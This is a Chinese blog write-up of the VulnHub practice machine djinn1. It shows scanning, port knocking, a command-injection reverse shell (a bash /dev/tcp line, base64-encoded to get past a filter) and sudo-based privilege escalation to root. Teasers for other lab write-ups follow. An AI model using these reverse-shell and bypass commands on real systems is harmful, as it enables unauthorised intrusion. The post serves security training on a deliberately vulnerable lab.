vulnhub靶机：djinn1

时间：2024-03-19 15:14:41浏览次数：28

标签：10.9 res nc 端口 djinn1 23.212 vulnhub strip 靶机

一：信息收集

1：主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.212

2：端口扫描

nmap -A -p- -T4 10.9.23.212

ftp允许匿名登录
扫描ssh时被过滤了
1337不知道是个什么端口
7331端口是个 python环境的 web服务

3：端口探测

1：ftp端口

ftp 10.9.23.212

anonymous

查看文件

nitu:81299

nitish81299

2：1337端口

此端口运行的是telnet服务，用nc连接了一下，得到提示，连续正确回答问题1000次，会得到一个礼物。

nc -vv 10.9.23.212 1337

利用网上找到的脚本

coding:utf-8

import logging
import telnetlib
import time
import re

def main():
try:
tn = telnetlib.Telnet('10.9.23.212', port=1337)
except:
logging.warning("errr")
time.sleep(0.5)
loop = 1
while loop < 1002:
data = tn.read_very_eager().decode('ascii')
print(data)
res = re.search('(.*?)\s>', data).group(1)
datas = str(calc(res)).strip()
print(str(loop) + ":" + datas)
loop = loop + 1
tn.write(datas.encode('ascii') + b"\n")
time.sleep(0.1)
data = tn.read_very_eager().decode('ascii')
return data

def calc(res):
res_str = res.strip('(').strip(")").replace("'", "")
muns = res_str.split(',')
munber1 = muns[0].strip()
orperator = muns[1].strip()
munber2 = muns[2].strip()
res = eval(munber1 + orperator + munber2)
return res

print(main())

python 1.py运行脚本

1356, 6784, 3409

因为ssh是过滤的，联想到这三个数字可能是端口敲门的端口，用nc测试连接

nc 10.9.23.212 1356
nc 10.9.23.212 6784
nc 10.9.23.212 3409

nmap -p 22 10.9.23.212

也可以直接开启

knock 10.9.23.212 1356 6784 3409

3：7331端口

4：目录遍历

gobuster dir -u http://10.9.23.212:7331/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100

/genie

/wish

访问/wish目录，看起来像是命令执行，测试一下，一旦执行下面的命令，页面会跳转，并通过审查元素可以定位出命令执行结果

二：渗透测试

1：反弹shell

bp抓包

反弹shell

bash -i >& /dev/tcp/10.9.23.212/6666 0>&1

被拦截了，尝试base64编码绕过

在kali里输入

└─# echo "bash -i &> /dev/tcp/10.9.23.112/6666 0>&1"|base64

在burp中输入

echo YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC45LjIzLjExMi82NjY2IDA+JjEK | base64 -d | bash

按Ctrl+U，编码快捷键

反弹成功

2：提权

在 nitish 的家目录下发现了 nitish 的密码

nitish:p4ssw0rdStr3r0n9

su进行切换，并获得第一个user.txt

切换为pythonshell，这里不切换的话，不能使用su切换用户。

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看sudo权限

这里genie命令可以使用sam的身份进行运行，而且无需passwd

使用sam的身份运行id，成功的切换为sam

sudo -u sam genie -cmd id

再次查看sudo权限

sudo -l

发现lago命令可以用root的身份运行，并且不需要passwd

sudo -u root /root/lago

输入num则会运行system('/bin/sh')

若是用root的身份运行system('/bin/sh')那么就会得到一个root的shell

标签：10.9,res,nc,端口,djinn1,23.212,vulnhub,strip,靶机
From： https://www.cnblogs.com/woaishuaidan/p/18082867

buuctf靶机笔记3
BUUXSSCOURSE首页如此显然是持久性xss将数据存储到后台管理员访问后台触发xss后可以盗取cookie对后台进行登录但我们还不知道后台地址先尝试：<script>alert(1)</script>提交成功尝试访问没有触发弹窗可能后台存在过滤尝试用img标签：<imgsrc='11'onerror=alert(11......
vulnhub靶机：dc-8
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24靶机ip10.9.23.742：端口扫描nmap-A-p--T410.9.23.743：端口探测4：目录遍历dirbhttp://10.9.23.74http://10.9.23.74/robots.txt发现有登录界面地址，访问一下：/?q=user/login/发现可能存在sql注入二：渗透测......
vulnhub靶机：dc-7
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.1572：端口扫描nmap-A-p--T410.9.23.1573：端口探测给的提示去搜索一下@DC7USER发现是github的一些代码，下载进行查看在config.php配置文件里发现了用户名和密码$username="dc7user";$passwo......
Vulnhub之DarkHole_1
DarkHole_1一信息收集IP扫描端口扫描访问80目录扫描查看目录80网页-->login注册用户我的id是2，那么应该有个账号是id=1，尝试越权修改id=1的密码把id改为1发现登陆成功，多了一个上传文件的地方，前面的目录扫描中我们也发现了/upload路径，尝试上传反弹shell上传一句话木......
vulnhub靶机：dc-6
一：信息收集1：主机发现靶机IP10.9.23.1302：端口扫描nmap-A-p--T410.9.23.1303：端口探测访问失败，返回wordy的域名，在添加hosts文件：访问成功后发现和dc2长的很像用的是wordpress，用wpscan试一下wpscan--urlhttp://wordy/-eu扫出来五个用户名adminmarkgraham......
BUUCTF靶机笔记
BUUBRUTE11启动靶机后可以看到是一个登陆页面查看源代码：没有有用的信息只是单纯的html页面随便填一个用户：admin密码：123提示密码为四位怀疑是暴力破解使用burp进行单点爆破payload设定暴力完成查看length不同的数据包返回flag：flag{6982d5b6-a2f8-48d8-aec6......
vulnhub靶机：dc-5
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042：端口扫描nmap-A-p--T410.9.23.2043：端口探测发现contact里面他有输入框发现底下这个页脚会发生变化，猜测存在文件包含漏洞，先扫一下目录4：目录遍历dirsearch-u10.9.23......
Vulnhub内网渗透Jangow01靶场通关
详细请见个人博客靶场下载地址。下载下来后是.vmdk格式，vm直接导入。M1请使用UTM进行搭建，教程见此。该靶场可能出现网络问题，解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口，对......
vulnhub靶机：dc4
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.9.23.522：端口扫描nmap-A-p--T410.9.23.523：端口探测二：渗透测试1：密码爆破尝试九头蛇进行爆破构建语句：hydra-ladmin-Ppass.txt10.9.23.52http-post-form"/login.php:us......
vulnhub靶机：dc3
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.4.9.23.2432：端口扫描nmap-A-p--T410.9.23.2433：端口探测提示要获取root权限4：目录遍历查看Wapplayzer信息：使用的Joomla系统，所以使用joomscan（Joomla漏洞扫描器）扫描器扫描：joom......